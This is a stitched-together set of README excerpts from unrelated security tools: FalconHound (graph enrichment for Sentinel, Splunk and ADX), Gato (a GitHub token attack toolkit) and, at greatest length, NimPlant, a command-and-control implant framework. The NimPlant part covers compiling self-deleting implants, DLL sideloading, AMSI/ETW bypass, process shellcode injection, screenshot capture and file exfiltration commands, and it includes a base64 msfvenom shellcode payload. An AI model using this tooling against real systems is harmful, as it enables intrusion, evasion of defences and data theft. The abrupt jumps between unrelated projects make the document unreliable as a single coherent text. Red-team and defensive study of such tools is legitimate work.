The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.
- Name: Watchlist
Enabled: true
WatchlistName: FH_MDE_Exploitable_Machines
DisplayName: MDE Exploitable Machines
SearchKey: DeviceName
Overwrite: true
The WatchlistName
field is the name of the watchlist. The DisplayName
field is the display name of the watchlist.
The SearchKey
field is the column that will be used as the search key.
The Overwrite
field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.
Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: Splunk
Enabled: true
Like Sentinel, the ADX target will write the results of the query to an ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: ADX
Enabled: true
Table: "name"
Once a session has ended, it would have to be removed from the graph, but this felt like a waste of information. So instead of removing the session, it will be added as a relationship between the computer and the user. The relationship will be called HadSession
. The relationship will have the following properties:
{
"till": "2021-08-31T14:00:00Z",
"source": "falconhound",
"reason": "logoff",
}
This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.
FalconHound will add the following properties to nodes in the graph:
Computer:
- 'exploitable': true/false
- 'exploits': list of CVEs
- 'exposed': true/false
- 'ports': list of ports accessible from the internet
- 'alertids': list of alert ids
The currently supported ways of providing FalconHound with credentials are:
The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practice is to separate the apps on a per-service level, but you can use one AppID/AppSecret for all Azure-based actions.
The required permissions for your AppID/AppSecret are listed here.
A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on an AppID/AppSecret, which needs to be configured in the config.yml file.
The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User
role on this Keyvault. This role only allows reading the secrets, not even listing them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.
The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.
SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository
Once configured you can add the -keyvault
parameter while starting FalconHound.
When the -keyvault
parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml
. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.
FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.
All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.
Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.
While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to complement the collection and remove the moment-in-time problem of periodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.
It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.
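As a hypothetical example of the FalconHound side of that schedule (the installation path is a placeholder for your own setup):
# hypothetical crontab entry -- run FalconHound every 15 minutes with an explicit config
*/15 * * * * /opt/falconhound/falconhound -go -config /opt/falconhound/config.yml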
This project is licensed under the BSD3 License - see the LICENSE file for details.
This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.
Gato, or GitHub Attack Toolkit, is an enumeration and attack tool that allows both blue teamers and offensive security practitioners to evaluate the blast radius of a compromised personal access token within a GitHub organization.
The tool also allows searching for and thoroughly enumerating public repositories that utilize self-hosted runners. GitHub recommends that self-hosted runners only be utilized for private repositories; however, there are thousands of organizations that utilize self-hosted runners.
Gato supports OS X and Linux with at least Python 3.7.
In order to install the tool, simply clone the repository and use pip install
. We recommend performing this within a virtual environment.
git clone https://github.com/praetorian-inc/gato
cd gato
python3 -m venv venv
source venv/bin/activate
pip install .
Gato also requires that git
version 2.27
or above is installed and on the system's PATH. In order to run the fork PR attack module, sed
must also be installed and present on the system's path.
After installing the tool, it can be launched by running gato
or praetorian-gato
.
We recommend viewing the parameters for the base tool using gato -h
, and the parameters for each of the tool's modules by running the following:
gato search -h
gato enum -h
gato attack -h
The tool requires a GitHub classic PAT in order to function. To create one, log in to GitHub and go to GitHub Developer Settings and select Generate New Token
and then Generate new token (classic)
.
After creating this token set the GH_TOKEN
environment variable within your shell by running export GH_TOKEN=<YOUR_CREATED_TOKEN>
. Alternatively, store the token within a secure password manager and enter it when the application prompts you.
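For example (the token value is a placeholder):
export GH_TOKEN=<YOUR_CREATED_TOKEN>
gato enum -h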
For troubleshooting and additional details, such as installing in developer mode or running unit tests, please see the wiki.
Please see the wiki for detailed documentation, as well as OpSec considerations for the tool's various modules!
If you believe you have identified a bug within the software, please open an issue containing the tool's output, along with the actions you were trying to conduct.
If you are unsure if the behavior is a bug, use the discussions section instead!
Contributions are welcome! Please review our design methodology and coding standards before working on a new feature!
Additionally, if you are proposing significant changes to the tool, please open an issue to start a conversation about the motivation for the changes.
By Cas van Cooten (@chvancooten), with special thanks to some awesome folks:
Among its features are execute-assembly support, a self-deleting implant option, and payload execution via inline-execute, shinject (using dynamic invocation), or in-thread execute-assembly.
To get set up:
- Install Nim (installation via choosenim is recommended, as apt doesn't always have the latest version).
- Install the client's Nim dependencies (cd client; nimble install -d).
- Install requirements.txt from the server folder (pip3 install -r server/requirements.txt).
- Install the mingw toolchain for your platform (brew install mingw-w64 or apt install mingw-w64).
Before using NimPlant, create the configuration file config.toml
. It is recommended to copy config.toml.example
and work from there.
An overview of settings is provided below.
Category | Setting | Description |
---|---|---|
server | ip | The IP that the C2 web server (including API) will listen on. Recommended to use 127.0.0.1, only use 0.0.0.0 when you have setup proper firewall or routing rules to protect the C2. |
server | port | The port that the C2 web server (including API) will listen on. |
listener | type | The listener type, either HTTP or HTTPS. HTTPS options configured below. |
listener | sslCertPath | The local path to a HTTPS certificate file (e.g. requested via LetsEncrypt CertBot or self-signed). Ignored when listener type is 'HTTP'. |
listener | sslKeyPath | The local path to the corresponding HTTPS certificate private key file. Password will be prompted when running the NimPlant server if set. Ignored when listener type is 'HTTP'. |
listener | hostname | The listener hostname. If not empty (""), NimPlant will use this hostname to connect. Make sure you are properly routing traffic from this host to the NimPlant listener port. |
listener | ip | The listener IP. Required even if 'hostname' is set, as it is used by the server to register on this IP. |
listener | port | The listener port. Required even if 'hostname' is set, as it is used by the server to register on this port. |
listener | registerPath | The URI path that new NimPlants will register with. |
listener | taskPath | The URI path that NimPlants will get tasks from. |
listener | resultPath | The URI path that NimPlants will submit results to. |
nimplant | riskyMode | Compile NimPlant with support for risky commands. Operator discretion advised. Disabling will remove support for execute-assembly , powershell , shell and shinject . |
nimplant | sleepMask | Whether or not to use Ekko sleep mask instead of regular sleep calls for Nimplants. Only works with regular executables for now! |
nimplant | sleepTime | The default sleep time in seconds for new NimPlants. |
nimplant | sleepJitter | The default jitter in percent for new NimPlants. |
nimplant | killDate | The kill date for Nimplants (format: yyyy-MM-dd). Nimplants will exit if this date has passed. |
nimplant | userAgent | The user-agent used by NimPlants. The server also uses this to validate NimPlant traffic, so it is recommended to choose a UA that is inconspicuous, but not too prevalent. |
Once the configuration is to your liking, you can generate NimPlant binaries to deploy on your target. Currently, NimPlant supports .exe
, .dll
, and .bin
binaries for (self-deleting) executables, libraries, and position-independent shellcode (through sRDI), respectively. To generate, run python NimPlant.py compile
followed by your preferred binaries (exe
, exe-selfdelete
, dll
, raw
, or all
) and, optionally, the implant type (nim
, or nim-debug
). Files will be written to client/bin/
.
You may pass the rotatekey
argument to generate and use a new XOR key during compilation.
Notes:
The .dll binary exposes an exported Update function, which is triggered by DllMain for all entrypoints. This means you can use e.g. rundll32 .\NimPlant.dll,Update to trigger it, or use your LOLBIN of choice to sideload it (may need some modifications in client/NimPlant.nim).
PS C:\NimPlant> python .\NimPlant.py compile all
* *(# #
** **(## ##
######## ( ********
####(###########************,****
# ######## ******** *
.### ***
.######## ********
#### ### *** ****
######### ### *** *********
####### #### ## ** **** *******
##### ## * ** *****
###### #### ##*** **** .******
############### ***************
########## **********
#########**********
#######********
_ _ _ ____ _ _
| \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
| \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
| |\ | | | | | | | __/| | (_| | | | | |_
|_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|
A light-weight stage 1 implant and C2 based on Nim and Python
By Cas van Cooten (@chvancooten)
Compiling .exe for NimPlant
Compiling self-deleting .exe for NimPlant
Compiling .dll for NimPlant
Compiling .bin for NimPlant
Done compiling! You can find compiled binaries in 'client/bin/'.
The Docker image chvancooten/nimbuild can be used to compile NimPlant binaries. Using Docker is easy and avoids dependency issues, as all required dependencies are pre-installed in this container.
To use it, install Docker for your OS and start the compilation in a container as follows.
docker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 NimPlant.py compile all
Once you have your binaries ready, you can spin up your NimPlant server! No additional configuration is necessary as it reads from the same config.toml
file. To launch a server, simply run python NimPlant.py server
(with sudo privileges if running on Linux). You can use the console once a Nimplant checks in, or access the web interface at http://localhost:31337
(by default).
Notes:
- Make sure the config.toml and .xorkey used by the server match the ones used when compiling your NimPlant binaries. If not, NimPlant will not be able to connect.
- Logs are stored in the server/logs directory. Each server instance creates a new log folder, and logs are split per console/nimplant session. Downloads and uploads (including files uploaded via the web GUI) are stored in the server/uploads and server/downloads directories respectively.
- Server data is stored in server/nimplant.db. This data is also used to recover Nimplants after a server restart.
- To clean up all server data, run NimPlant.py with the cleanup flag. Caution: This will purge everything, so make sure to back up what you need first!
flag. Caution: This will purge everything, so make sure to back up what you need first!PS C:\NimPlant> python .\NimPlant.py server
* *(# #
** **(## ##
######## ( ********
####(###########************,****
# ######## ******** *
.### ***
.######## ********
#### ### *** ****
######### ### *** *********
####### #### ## ** **** *******
##### ## * ** *****
###### #### ##*** **** .******
############### ***************
########## **********
#########**********
#######********
_ _ _ ____ _ _
| \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
| \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
| |\ | | | | | | | __/| | (_| | | | | |_
|_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|
A light-weight stage 1 implant and C2 written in Nim and Python
By Cas van Cooten (@chvancooten)
[06/02/2023 10:47:23] Started management server on http://127.0.0.1:31337.
[06/02/2023 10:47:23] Started NimPlant listener on https://0.0.0.0:443. CTRL-C to cancel waiting for NimPlants.
This will start both the C2 API and management web server (in the example above at http://127.0.0.1:31337
) and the NimPlant listener (in the example above at https://0.0.0.0:443
). Once a NimPlant checks in, you can use both the web interface and the console to send commands to NimPlant.
Available commands are as follows. You can get detailed help for any command by typing help [command]
. Certain commands denoted with (GUI) can be configured graphically when using the web interface; this can be done by calling the command without any arguments.
Command arguments shown as [required] <optional>.
Commands with (GUI) can be run without parameters via the web UI.
cancel Cancel all pending tasks.
cat [filename] Print a file's contents to the screen.
cd [directory] Change the working directory.
clear Clear the screen.
cp [source] [destination] Copy a file or directory.
curl [url] Get a webpage remotely and return the results.
download [remotefilepath] <localfilepath> Download a file from NimPlant's disk to the NimPlant server.
env Get environment variables.
execute-assembly (GUI) <BYPASSAMSI=0> <BLOCKETW=0> [localfilepath] <arguments> Execute .NET assembly from memory. AMSI/ETW patched by default. Loads the CLR.
exit Exit the server, killing all NimPlants.
getAv List Antivirus / EDR products on target using WMI.
getDom Get the domain the target is joined to.
getLocalAdm List local administrators on the target using WMI.
getpid Show process ID of the currently selected NimPlant.
getprocname Show process name of the currently selected NimPlant.
help <command> Show this help menu or command-specific help.
hostname Show hostname of the currently selected NimPlant.
inline-execute (GUI) [localfilepath] [entrypoint] <arg1 type1 arg2 type2..> Execute Beacon Object Files (BOF) from memory.
ipconfig List IP address information of the currently selected NimPlant.
kill Kill the currently selected NimPlant.
list Show list of active NimPlants.
listall Show list of all NimPlants.
ls <path> List files and folders in a certain directory. Lists current directory by default.
mkdir [directory] Create a directory (and its parent directories if required).
mv [source] [destination] Move a file or directory.
nimplant Show info about the currently selected NimPlant.
osbuild Show operating system build information for the currently selected NimPlant.
powershell <BYPASSAMSI=0> <BLOCKETW=0> [command] Execute a PowerShell command in an unmanaged runspace. Loads the CLR.
ps List running processes on the target. Indicates current process.
pwd Get the current working directory.
reg [query|add] [path] <key> <value> Query or modify the registry. New values will be added as REG_SZ.
rm [file] Remove a file or directory.
run [binary] <arguments> Run a binary from disk. Returns output but blocks NimPlant while running.
screenshot Take a screenshot of the user's screen.
select [id] Select another NimPlant.
shell [command] Execute a shell command.
shinject (GUI) [targetpid] [localfilepath] Load raw shellcode from a file and inject it into the specified process's memory space using dynamic invocation.
sleep [sleeptime] <jitter%> Change the sleep time of the current NimPlant.
upload (GUI) [localfilepath] <remotefilepath> Upload a file from the NimPlant server to the victim machine.
wget [url] <remotefilepath> Download a file to disk remotely.
whoami Get the user ID that NimPlant is running as.
NOTE: BOFs are volatile by nature, and running a faulty BOF or passing wrong arguments or types WILL crash your NimPlant session! Make sure to test BOFs before deploying!
NimPlant supports the in-memory loading of BOFs thanks to the great NiCOFF project. Running a bof requires a local compiled BOF object file (usually called something like bofname.x64.o
), an entrypoint (commonly go
), and a list of arguments with their respective argument types. Arguments are passed as a space-separated arg argtype
pair.
Arguments are given in accordance with the "Zzsib" format, so can be either string
(alias: z
), wstring
(or Z
), integer
(aliases: int
or i
), short
(s
), or binary
(bin
or b
). Binary arguments can be a raw binary string or base64-encoded, the latter is recommended to avoid bad characters.
Some examples of usage (using the magnificent TrustedSec BOFs [1, 2] as an example) are given below. Note that inline-execute
(without arguments) can be used to configure the command graphically in the GUI.
# Run a bof without arguments
inline-execute ipconfig.x64.o go
# Run the `dir` bof with one wide-string argument specifying the path to list, quoting optional
inline-execute dir.x64.o go "C:\Users\victimuser\desktop" Z
# Run an injection BOF specifying an integer for the process ID and base64-encoded shellcode as bytes
# Example shellcode generated with the command: msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f base64
inline-execute /linux/path/to/createremotethread.x64.o go 1337 i /EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7 RxNyb2oAWUGJ2v/VY2FsYy5leGUA b
# Depending on the BOF, sometimes argument parsing is a bit different using NiCOFF
# Make sure arguments are passed as expected by the BOF (can usually be retrieved from .CNA or BOF source)
# An example:
inline-execute enum_filter_driver.x64.o go # CRASHES - default null handling does not work
inline-execute enum_filter_driver.x64.o go "" z # OK - arguments are passed as expected
NimPlant supports push notifications via the notify_user()
hook defined in server/util/notify.py
. By default, it implements a simple Telegram notification which requires the TELEGRAM_CHAT_ID
and TELEGRAM_BOT_TOKEN
environment variables to be set before it will fire. Of course, the code can be easily extended with one's own push notification functionality. The notify_user()
hook is called when a new NimPlant checks in, and receives an object with NimPlant details, which can then be pushed as desired.
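For example, to use the built-in Telegram notifications, the required variables can be exported before starting the server (both values are placeholders):
export TELEGRAM_CHAT_ID="123456789"
export TELEGRAM_BOT_TOKEN="<YOUR_BOT_TOKEN>"
python NimPlant.py server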
As a normal user, you shouldn't have to modify or re-build the UI that comes with Nimplant. However, if you so desire to make changes, install NodeJS and run an npm install
while in the ui
directory. Then run ui/build-ui.py
. This will take care of pulling the packages, compiling the Next.JS frontend, and placing the files in the right location for the Nimplant server to use them.
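A minimal sketch of that flow (assuming NodeJS and npm are already installed, and that build-ui.py is run from the repository root):
cd ui
npm install
cd ..
python3 ui/build-ui.py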
NimPlant was developed as a learning project and released to the public for transparency and educational purposes. For a large part, it makes no effort to hide its intentions. Additionally, protections have been put in place to prevent abuse. In other words, do NOT use NimPlant in production engagements as-is without thorough source code review and modifications! Also remember that, as with any C2 framework, the OPSEC fingerprint of running certain commands should be considered before deployment. NimPlant can be compiled without OPSEC-risky commands by setting riskyMode
to false
in config.toml
.
There are many reasons why Nimplant may fail to compile or run. If you encounter issues, please try the following (in order):
- Try compiling with the chvancooten/nimbuild docker container to rule out any dependency issues.
- Check the server/logs directory for any errors.
- Use the nim-debug compilation mode to compile with console and debug messages (.exe only) to see if any error messages are returned.